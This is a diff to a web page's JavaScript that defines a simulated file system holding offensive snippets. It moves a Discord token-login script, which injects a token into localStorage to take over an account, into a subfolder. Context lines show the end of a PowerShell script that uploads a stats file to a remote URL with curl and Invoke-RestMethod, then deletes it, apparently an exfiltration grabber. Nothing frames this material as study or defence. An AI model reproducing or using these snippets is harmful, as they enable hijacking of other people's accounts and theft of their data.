--- a/index.html
+++ b/index.html
@@ -225,21 +225,6 @@
 
     /* Define File System Object */
     const fileSystem = {
-      name: "root",
-      files: [
-        {
-          name: "Discord Token Login Code.txt",
-          content: "function login(token) {
-setInterval(() => {
-document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
-}, 50);
-setTimeout(() => {
-location.reload();
-}, 2500);
-}
-login ('PASTE TOKEN HERE')"
-        }
-      ],
       folders: [
         {
           name: "Applications",
@@ -266,6 +251,20 @@ Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body (
 curl.exe -F "file1=@stats.txt" $url;
 Remove-Item '.\\stats.txt';
 exit`
+            }
+          ],
+          files: [
+            {
+              name: "Discord Login Code.txt",
+              content: `function login(token) {
+setInterval(() => {
+document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
+}, 50);
+setTimeout(() => {
+location.reload();
+}, 2500);
+}
+login ('PASTE TOKEN HERE')`
             }
           ],
           folders: [
